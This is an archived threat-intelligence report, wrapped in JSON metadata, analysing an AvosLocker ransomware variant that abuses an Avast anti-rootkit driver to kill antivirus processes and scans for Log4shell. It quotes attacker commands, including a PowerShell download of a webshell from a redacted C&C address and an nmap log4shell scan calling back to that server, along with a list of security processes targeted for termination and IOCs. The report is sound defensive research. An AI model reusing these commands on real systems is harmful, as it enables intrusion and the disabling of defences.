{ "id": "7b13e252-b424-4aa0-9c66-d58c6960134c", "created_at": "2026-04-06T00:16:32.775824Z", "updated_at": "2026-04-10T03:22:10.37833Z", "deleted_at": null, "sha1_hash": "2f1d25816c274a7d32a92bc4c341df8ce5df6503", "title": "AvosLocker Ransomware Variant Abuses Driver File to Disable Anti-Virus, Scans for Log4shell", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1997793, "plain_text": "AvosLocker Ransomware Variant Abuses Driver File to Disable Anti-Virus, Scans for Log4shell\r\nBy By: Christoper Ordonez, Alvin Nieto May 02, 2022 Read time: 7 min (1825 words)\r\nPublished: 2022-05-02 · Archived: 2026-04-05 13:36:28 UTC\r\nRansomware\r\nWe found an AvosLocker ransomware variant using a legitimate antivirus component to disable detection and blocking\r\nsolutions.\r\nWe found samples of AvosLockernews article ransomware that makes use of a legitimate driver file to disable antivirus\r\nsolutions and detection evasion. While previous AvosLocker infections employ similar routines, this is the first sample we\r\nobserved from the US with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file\r\n(asWarPot.sys).  In addition, the ransomware is also capable of scanning multiple endpoints for the Log4j vulnerability\r\nLog4shell using Nmap NSE script.\r\nInfection chain\r\nFigure 1. AvosLocker infection chain\r\nAccording to our analysis, the suspected entry point is via the Zoho ManageEngine ADSelfService Plus (ADSS) exploit:\r\nFigure 2. The ADSS exploit abusing CVE-2021-40539\r\nDue to the lack of network traffic details, we could not identify the exact CVE ID of the security gap the attacker used.\r\nHowever, there are some indications that they abused the same vulnerability previously documented by Synacktiv during a\r\npentest, CVE-2021-40539. The gap we observed was particularly similar to the creation of JSP files (test.jsp), execution of\r\nkeytool.exe with “null” parameters to run a crafted Java class/code.\r\nMapping the infection\r\nThe ADSS JAVA component (C:\\ManageEngine\\ADSelfService Plus\\jre\\bin\\java.exe) executed mshta.exe to remotely run a\r\nremotely-hosted HTML application (HTA) file from the attackers’ command and control (C\u0026C) server. Using Trend\r\nMicro™ Vision One™, we mapped out the processes that the infection performed to spawn the process. \r\nhttps://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html\r\nPage 1 of 9\n\nFigure 3. Remotely executing an HTA file from the C\u0026C server. Screenshots taken from Trend Micro Vison\r\nOne.\r\nFigure 4. HTA file connecting to the C\u0026C\r\nA closer look at the HTA file revealed that the mshta.exe downloads and executes the remotely hosted HTA file. The HTA\r\nexecuted an obfuscated PowerShell script that contains a shellcode, capable of connecting back to the C\u0026C server to\r\nexecute arbitrary commands.\r\nFigure 5. Obfuscated PowerShell script contains a shellcode\r\nThe PowerShell process will download an ASPX webshell from the C\u0026C server using the command \u003c cmd.exe /c\r\npowershell -command Invoke-WebRequest -Uri hxxp://xx.xx.xx.xx/subshell.aspx -OutFile /ManageEngine/ADSelfService\r\nPlus/webapps/adssp/help/admin-guide \u003e. According to Synacktiv’s research, with this command, the downloaded ASPX\r\nwebshell is downloaded from a remote IP address and saved to the directory, and still accessible to the attacker. The\r\nattackers gathered system information using available tools such as whoami and systeminfo, as well as PowerShell\r\ncommands.\r\nFigure 6. Gather system information\r\nThe code executes on the current domain controller to gather the username information, while the query user information\r\ngathers data about user sessions on a Remote Desktop Session Host server, name of the user, session ID, state of the session\r\n(either active or disconnected), idle time, date, and time the user logged on.\r\nFigure 7. Executed with the /domain argument to collect username information\r\nhttps://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html\r\nPage 2 of 9\n\nFigure 8. query user information for session data\r\nThe PowerShell downloads, installs, and allows the remote desktop tool AnyDeskMSI through the firewall.\r\nFigure 9. The PowerShell downloading and installing AnyDeskMSI\r\nWe observed that a new user account was created, added to the current domain, and included in the administrator group.\r\nThis ensures the attacker can have administrative rights to the infected system. The attackers also checked the running\r\nprocesses in the system via TaskList to check for antivirus processes running in the infiltrated system.\r\nFigure 10. Creating a new account with admin rights\r\nFigure 11. Checking for antivirus processes running\r\nDuring the scan, we observed an attempt to terminate security products initiated via TaskKill. Testing the sample with Trend\r\nMicro Vision One, the attempt failed as its sensors were still able to send activity data to the platform.\r\nFigure 12. Terminating security products running\r\nTools and functions\r\nAdditional tools and components were copied to the compromised machine using AnyDeskMSI to scan the local network\r\nand disable security products. The tools transferred using AnyDesk are:\r\nNetscan: To scan for other endpoints\r\nNmap (log4shell.nse): To scan for Log4shell vulnerable endpoints\r\nHacking tools Mimikatz and Impacket: For lateral movement\r\nPDQ deploy: For mass deployment of malicious script to multiple endpoints\r\nhttps://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html\r\nPage 3 of 9\n\nAswarpot.sys: For disabling defense solutions. We noted that it can disable a number of antivirus products,\r\npreviously identified by Aon’s researchers.\r\nFigure 13. Copying tools and other malicious components to the compromised machine using AnyDesk\r\nWe found an Avast anti-rootkit driver installed as service 'asWarPot.sys' using the command sc.exe  create aswSP_ArPot2\r\nbinPath= C:\\windows\\aswArPot.sys type= kernel. It installs the driver file in preparation for disabling the running antivirus\r\nproduct. We noted the unusual use of cmd.exe for execution of the file.  \r\nFigure 14. Executing the anti-rootkit driver in the system\r\nMimikatz components were also copied to the affected machine via AnyDeskMSI. However, these components were\r\ndetected and deleted.\r\nFigure 15. Detecting and deleting Mimikatz\r\nWe observed the PowerShell script disabling the security products by leveraging aswarpot.sys (a legitimate Avast Anti-Rootkit Driver). A list of security product processes was supplied and subsequently terminated by the driver.\r\nFigure 16. Listing and terminating the security products found running in the compromised system\r\nVerification: Manual replication of antivirus disabling routine\r\nWe manually replicated the routine and commands for disabling the defense solutions to further look into the routine. Figure\r\n17 shows the list of processes that the routine searches on infection :\r\nEndpointBasecamp.exe\r\nTrend Micro Endpoint Basecamp\r\nResponseService.exe\r\nhttps://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html\r\nPage 4 of 9\n\nPccNTMon.exe\r\nSupportConnector.exe\r\nAOTAgent.exe\r\nCETASvc.exe\r\nCETASvc\r\niVPAgent.exe\r\ntmwscsvc.exe\r\nTMResponse\r\nAOTAgentSvc\r\nTMBMServer\r\niVPAgent\r\nTrend Micro Web Service Communicator\r\nTmccsf\r\nTmlisten\r\nNtrtscan\r\nTmWSCSvc\r\nFigure 17. Searching for processes\r\nWe found that aswArPot.sys, registered as aswSP_ArPot2 as a service, is used as the handle for the following\r\nDeviceIoControl call.\r\nFigure 18. Driver file preparing to disable an antivirus product\r\nThe DeviceIoControl function is used to execute parts of the driver. In this case, the DeviceIoControl is inside a loop that\r\niterates through the list of processes mentioned above. Additionally, we can see that 0x9988C094 is passed to\r\nDeviceIoControl as an argument simultaneous to the ID of the current process in the iteration.\r\nFigure 19. DeviceIoControl as an argument with the current process ID\r\nInside aswArPot.sys, we saw 0x9988C094 in a switch case with a function sub_14001DC80 case. Inside function\r\nsub_14001DC80, we can see that that function has the capability to terminate a given process.\r\nhttps://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html\r\nPage 5 of 9\n\nFigure 20. 0x9988C094 in a switch case with sub_14001DC80 (above), with the latter value terminating a\r\nprocess (below).\r\nOther executions and lateral movement\r\nAfter disabling the security products, the actors behind AvosLocker again tried to transfer other tools, namely Mimikatz and\r\nImpacket.\r\nhttps://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html\r\nPage 6 of 9\n\nFigure 21. Execution of Mimikatz (above) and Impacket via C:\\temp\\wmiexec.exe (below)\r\nWe also observed the execution of a password recovery tool XenArmor with C:\\temp\\pass\\start.exe.\r\nFigure 22. XenArmor password recovery tool execution\r\nWe observed the attackers using an NMAP script to check for Log4shell, the Apache Log4j remote code execution (RCE,\r\nwith ID CVE-2021-44228) vulnerability across the network. They used the command nmap  --script log4shell.nse --script-args log4shell.waf-bypass=true --script-args log4shell.callback-server=xx.xx.xx.xx:1389 -p 80,443 xx.xx.xx.xx/xx, and set\r\nthe callback server to the attacker group C\u0026C server. \r\nFigure 23. Checking for log4shell\r\nWe also observed more system network configuration discovery techniques being run, possibly for lateral movement as it\r\ntried looking for other available endpoints.\r\nFigure 24. Running more system network configuration discovery scans\r\nDeploying across the network\r\nWe saw software deployment tool PDQ being used to deploy malicious batch scripts to multiple endpoints in the network.\r\nFigure 25. Deploying malicious batch scripts to other endpoints\r\nThe deployed batch script has the following commands:\r\nDisable Windows Update and Microsoft Defender\r\nFigure 26. Disable Microsoft defense services\r\nPrevents safeboot execution of security products\r\nhttps://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html\r\nPage 7 of 9\n\nFigure 27. Prevent security products’ execution\r\nCreate new administrator account\r\nFigure 28. Create new account\r\nAdd the AutoStart mechanism for the AvosLocker executable (update.exe)\r\nFigure 29. Add Autostart for ransomware executable\r\nDisables legal notice caption\r\nFigure 30. Disable legal notice\r\nSet safeboot with networking and disables Windows Error Recovery and reboot\r\nFigure 31. Setting and disabling network and specific Windows functions\r\nConclusion\r\nWhile AvosLocker has been documented for its abuse of AnyDesk for lateral movement as its preferred application, we note\r\nthat other remote access applications can also be abused to replace it. We think the same can be said for the software\r\ndeployment tool, wherein the malicious actors can subsequently decide to replace and abuse it with other commercially\r\navailable ones. In addition, aside from its availability, the decision to choose the specific rootkit driver file is for its\r\ncapability to execute in kernel mode (therefore operating at a high privilege).\r\nThis variant is also capable of modifying other details of the installed security solutions, such as disabling the legal notice.\r\nOther modern ransomware, such as Mespinoza/Pysanews- cybercrime-and-digital-threats, modify the registries of infected\r\nsystems during their respective routines to inform their victims that they have been compromised.\r\nSimilar to previously documented malware and ransomware groups, AvosLocker takes advantage of the different\r\nvulnerabilities that have yet to be patched to get into organizations’ networks. Once inside, the continuing trend of abusing\r\nlegitimate tools and functions to mask malicious activities and actors’ presence grows in sophistication. In this case, the\r\nattackers were able to study and use Avast’s driver as part of their arsenal to disable other vendors’ security products.\r\nhttps://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html\r\nPage 8 of 9\n\nHowever, and specific to this instance, the attempt to kill an antivirus product such as this variant’s TaskKill can also be\r\nfoiled. In this example using Trend Micro Vision One, the attempt was unsuccessful likely due to the product’s self-protection feature, which allowed the sensors to continue sending data and block the noted routine. The visibility enabled by\r\nthe platform allowed us as researchers to capture the extent of this ransomware’s attack chain and replicate the driver file\r\nbeing abused to verify its function during compromise.\r\nAvast responded to our notification with this statement:\r\n\"We can confirm the vulnerability in an old version of our driver aswArPot.sys, which we fixed in our Avast 21.5 released in\r\nJune 2021. We also worked closely with Microsoft, so they released a block in the Windows operating system (10 and 11), so\r\nthe old version of the Avast driver can't be loaded to memory.\r\nThe below example shows that the blocking works (output from the \"sc start\" command):\r\n               (SC) StartService FAILED 1275:\r\n               This driver has been blocked from loading\r\nThe update from Microsoft for the Windows operating system was published in February as an optional update, and in\r\nMicrosoft's security release in April, so fully updated machines running Windows 10 and 11 are not vulnerable to this kind of\r\nattack.\r\nAll consumer and business antivirus versions of Avast and AVG detect and block this AvosLocker ransomware variant, so\r\nour users are protected from this attack vector.\r\nFor users of third-party antivirus software, to stay protected against this vulnerability, we recommend users to update their\r\nWindows operating system with the latest security updates, and to use a fully updated antivirus program.\"\r\nIndicators of Compromise (IOCs) \r\nFile SHA256 Detection\r\nMalicious\r\nbatch file\r\ncomponent\r\na5ad3355f55e1a15baefea83ce81d038531af516f47716018b1dedf04f081f15 Trojan.BAT.KILLAV.YACAA\r\nAvosLocker\r\nexecutable\r\n05ba2df0033e3cd5b987d66b6de545df439d338a20165c0ba96cde8a74e463e5 Ransom.Win32.AVOSLOCKER.SMYX\r\nMimikatz\r\nexecutable\r\n(x32 and\r\nx64)\r\n912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9 HackTool.Win64.MIMIKATZ.ZTJA\r\ne81a8f8ad804c4d83869d7806a303ff04f31cce376c5df8aada2e9db2c1eeb98 HackTool.Win32.Mimikatz.CNFW\r\nLog4shell\r\nNmap NSE\r\nscript\r\nddcb0e99f27e79d3536a15e0d51f7f33c38b2ae48677570f36f5e92863db5a96 Backdoor.Win32.CVE202144228.YAC\r\nImpacket\r\ntool\r\n14f0c4ce32821a7d25ea5e016ea26067d6615e3336c3baa854ea37a290a462a8 HackTool.Win32.Impacket.AA\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html\r\nhttps://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html" ], "report_names": [ "avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html" ], "threat_actors": [], "ts_created_at": 1775434592, "ts_updated_at": 1775791330, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/2f1d25816c274a7d32a92bc4c341df8ce5df6503.pdf", "text": "https://archive.orkl.eu/2f1d25816c274a7d32a92bc4c341df8ce5df6503.txt", "img": "https://archive.orkl.eu/2f1d25816c274a7d32a92bc4c341df8ce5df6503.jpg" } }